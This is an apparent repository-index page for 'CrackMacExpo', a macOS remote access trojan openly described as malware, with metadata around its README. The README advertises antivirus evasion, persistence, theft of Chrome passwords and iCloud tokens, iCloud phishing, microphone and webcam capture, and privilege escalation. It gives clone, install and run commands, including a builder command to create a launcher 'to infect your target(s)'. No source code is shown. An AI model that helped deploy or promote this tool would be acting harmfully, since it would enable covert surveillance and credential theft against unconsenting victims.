https://github.com/byt3n33dl3/crackmacexpo
The most advanced Mach-O binary malware for macOS or Unix-based distro.
Science Score: 13.0%
This score indicates how likely this project is to be science-related based on various indicators:
-
○CITATION.cff file
-
✓codemeta.json file
Found codemeta.json file -
○.zenodo.json file
-
○DOI references
-
○Academic publication links
-
○Academic email domains
-
○Institutional organization owner
-
○JOSS paper metadata
-
○Scientific vocabulary similarity
Low similarity (13.3%) to scientific vocabulary
Keywords
Repository
The most advanced Mach-O binary malware for macOS or Unix-based distro.
Basic Info
- Host: GitHub
- Owner: byt3n33dl3
- License: gpl-3.0
- Language: C
- Default Branch: main
- Homepage: https://byt3n33dl3.substack.com
- Size: 20.3 MB
Statistics
- Stars: 43
- Watchers: 1
- Forks: 0
- Open Issues: 0
- Releases: 2
Topics
Metadata Files
README.md
CrackMacExpo
GUI frontend and CLI RAT, a Remote Access Tool for MacOS or OSX distro. Penetrate the SSL and Security system of OSX distro with a sharp IPA's Malware, Specialized for Apple.
MacOS & OSX
Features
- Emulate a terminal instance
- Simple extendable Module system
- Undetected by Anti Virus ( OpenSSL AES-256 encrypted payloads )
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Monitor the clipboard
- Retrieve browser history ( Chrome and Safari )
- Phish for iCloud passwords via iTunes
- iTunes ( iOS ) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use
```python
Clone or download this repository
$ git clone https://github.com/pxcs/CrackMacExpo
Go into the repository
$ cd CrackMacExpo
Install dependencies required by the server
$ sudo pip install -r requirements.txt
Start the GUI
$ python crackmacexpo.py
Lastly, run a built launcher on your target(s)
```
Warning: Because payloads are created unique to the target system ( Automatically by the server ), the server must be running when any bot connects for the first time.
Advanced users
There's also a CLI for those who want to use this over SSH: ```python
Create a launcher to infect your target(s)
$ python crackmacexpo.py --builder
Start the CLI
$ python crackmacexpo.py --cli --port 443
Lastly, run a built launcher on your target(s)
```
Issues
Feel free to submit any issues or feature requests here.
Contribution
For a simple guide on how to create modules click here.
Certifications Related
OSMR | Offensive Security macOS Researcher
GXPN | GIAC Exploit Researcher and Advanced Penetration Tester
eCPPT | INE Security Certified Professional Penetration Tester
eCPPTv2 | INE Security Certified Professional Penetration Tester v2
CᴵEH (Master) | Certified Ethical Hacker (Master)
LᴵPT (Master) | Licensed Penetration Tester (Master)
Credits
- The awesome Empire project
- Shoutout to Patrick Wardle for his awesome talks, check out Objective-See
- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
- The slowloris module is pretty much copied from PySlowLoris
- urwid and this code which saved me a lot of time with the CLI
- Logo created by GangstaCrew
- Repo Marten4n6
Contact Me
- pxmxx3csz@outlook.com
Owner
- Name: Sulaiman
- Login: byt3n33dl3
- Kind: user
- Location: Error 403: Not on earth
- Website: https://byt3n33dl3.substack.com/
- Twitter: byt3n33dl3
- Repositories: 91
- Profile: https://github.com/byt3n33dl3
I N F R A X 8 6
GitHub Events
Total
- Watch event: 24
- Fork event: 1
Last Year
- Watch event: 24
- Fork event: 1
Issues and Pull Requests
Last synced: 10 months ago
All Time
- Total issues: 0
- Total pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Total issue authors: 0
- Total pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0
Past Year
- Issues: 0
- Pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Issue authors: 0
- Pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0